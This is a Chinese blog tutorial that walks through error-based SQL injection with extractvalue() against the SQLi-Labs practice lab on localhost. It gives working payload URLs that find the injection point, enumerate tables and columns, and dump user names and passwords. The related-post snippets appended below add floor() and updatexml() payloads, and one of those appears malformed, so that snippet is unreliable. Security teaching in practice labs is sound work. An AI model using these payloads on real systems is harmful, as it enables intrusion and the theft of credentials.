基于extractvalue()的报错注入

已于 2022-02-18 14:25:23 修改
阅读量3.3k 收藏 10
点赞数 2
分类专栏: SQL注入
于 2022-02-18 14:19:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Z_l123/article/details/123001714
版权

SQL注入 extractvalue 数据库安全 信息探测 Web应用漏洞
关键词由优快云通过智能技术生成

报错注入前提:

(1) Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上

(2)后台未对一些具有报错功能的函数进行过滤
常用的报错功能函数包括extractvalue()、updatexml)、floor()、exp()等

报错原理:

xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx'。

该函数最大显示长度为32,超过长度可以配合substr、limit等函数来显示

1.访问SQLi-Labs网站

访问Less-1,并根据网页提示给定一个GET参数

http://127.0.0.1/sqli-labs/Less-1/?id=1

 

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://127.0.0.1/sqli-labs/Less-1/?id=1'

运行后报错!

http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1

 运行后正常显示!

http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='2

 运行后未正常显示!

由上述结果可以判断,网站存在字符型注入点。

3.获取网站当前所在数据库的库名

http://127.0.0.1/sqli-labs/Less-1/?id=1' and extractvalue(1,concat('~',database()))--+

显示结果为security

4.获取数据库security的全部表名

?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

 显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

注意:extractvalue()函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。因此,有时需要借助 limit来做分行显示,上述payload可以改为:

http://127.0.0.1/sqli-labs/Less-1/?id=1' and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit N,1)))--+

5.获取users表的全部字段名

?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

 显示结果,users表中有id、username和 password三个字段

同上一个步骤相似,为了避免错误信息太长导致显示不全,有时需要借助limit来做分行显示,上述payload可以改为:

http://127.0.0.1/sqli-labs/Less-1/?id=1' and extractvalue(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit N,1)))--+

6.获取users表id,username,和password字段的全部值

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

1)显示第一组数据

http://127.0.0.1/sqli-labs/Less-1/?id=1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 0,1)))--+

 2)显示第二组数据

http://127.0.0.1/sqli-labs/Less-1/?id=1' and extractvalue(1,concat('~',(select concat_ws(',',id,username,password) from security.users limit 1,1)))--+

 以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。 

《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL注入报错注入
qq_68163788的博客
01-27 3126
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
几种常见的报错注入类型详解
m0_74312676的博客
07-23 2048
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql注入-5floor报错注入
技术骨干小李的博客
07-20 715
对floor报错注入的基本学习
SQL注入-常见的报错注入类型详解
最新发布
lza20001103的博客
03-14 991
SQL注入-常见的报错注入类型详解
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1249
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
web安全】——floor报错注入
Demo不是emo的博客
01-06 1万+
floor报错注入深度剖析
【floor报错注入
My笔记的博客
09-27 1285
向下取整。
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 1058
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
SQL注入之路之三:报错注入
weixin_62715196的博客
08-10 697
主要简述什么是报错注入报错注入常用函数,报错注入原理以及如何使用爆破注入获取用户敏感信息
floor报错注入原理解析
weixin_54894046的博客
05-24 1885
报错需要满足的条件: floor()报错注入在MySQL版本8.0 已失效,经过测试7.3.4nts也已失效(据说的 本人没有实践过) 注入语句中查询用到的表内数据必须>=3条 需要用到的count(*)、floor()或者ceil()、rand()、group by rand()函数详解 RAND() RAND(N) 返回一个随机浮点值 v ,范围在 0 到1 之间 (即, 其范围为 0 ≤ v ≤ 1.0)。若已指定一个整数参数 N ,则它被用作种子值,用来产生重复序列。 通俗点
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 3561
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错
sql注入中的floor报错注入原理详解
哦 卷!
10-25 3114
floor()报错注入的原因是group by在向统计表插入数据时,由于rand()多次计算导致插入统计表时主键重复,从而报错。又因为报错前concat_ws()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。
SQL注入——基于报错注入extractvalue()】篇
大大怪将军,你来啦!
03-31 1066
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
报错注入floor
流浪法师的博客
07-09 346
判断是除了在id=1后面加引号,还可以加引号加单括号,等等… 如:id=1’ id=1’) and ‘1’=‘1’ and ‘1’=‘2’ id=1" id=1") and ‘1’=‘1’ and ‘1’=‘2’ (1). 通过floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中
extractvalue报错注入
bangyan3903的博客
08-18 3615
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
SQL注入之floor报错注入
weixin_46133275的博客
09-08 2128
SQL注入之floor报错注入原理一、count()函数、group by二、floor()函数三、rand()函数四、报错初体验五、报错注入1、获取当前数据库2、获取当前用户六、靶场报错注入1、获取当前数据库2、获取表名3、获取字段名4、获取字段内容总结 原理 通过使用count()、floor()、rand()、group by四个条件形成主键重复的错误 count():计算满足某一条件下的行数 floor():向下取整的函数 rand():生成0~1之间的浮点数 count():group
基于phpstudy 搭建sqllib靶场,使用union注入完成less1、less2 分别使用ex()报错和floor()报错注入完成less-5、使用updatexml()报错完成关卡less-6
09-07
基于phpstudy搭建sqllib靶场是一个利用phpstudy软件和sql-1ib靶场环境来学习和练习SQL注入技术的过程。这里提供一个大致的步骤指南,但请注意,进行SQL注入实验应在合法的测试环境中进行,避免进行非法的渗透测试。 1. 安装phpstudy软件,并启动服务。 2. 下载sqllib靶场,根据其文档或说明文件进行安装和配置。 3. 配置好靶场后,启动web服务。 接下来,我们将针对不同的关卡介绍如何使用不同的SQL注入技术: **less1 和 less2 (使用extract()函数报错注入)** 1. 找到可能存在SQL注入的输入点,例如表单提交或URL参数。 2. 尝试注入一些基本的SQL注入代码,比如单引号(')来检查是否存在SQL注入漏洞。 3. 如果存在注入点,使用extract()函数配合双写技术来触发报错。例如,如果id参数可控,可以尝试如下的URL: ``` ?id=1' union select 1, extractvalue(1,concat(0x7e,database()))# ?id=1' union select 1, extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))# ``` **less-5 (使用floor()函数报错注入)** 1. 同样找到可能存在SQL注入的输入点。 2. 使用floor()函数和一些技巧来构造报错注入。例如: ``` ?id=1' and floor(rand(0) * (select group_concat(schema_name) from information_schema.schemata))# ``` **less-6 (使用updatexml()函数报错注入)** 1. 确定可以注入的点。 2. 利用updatexml()函数来触发报错。例如: ``` ?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1)# ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值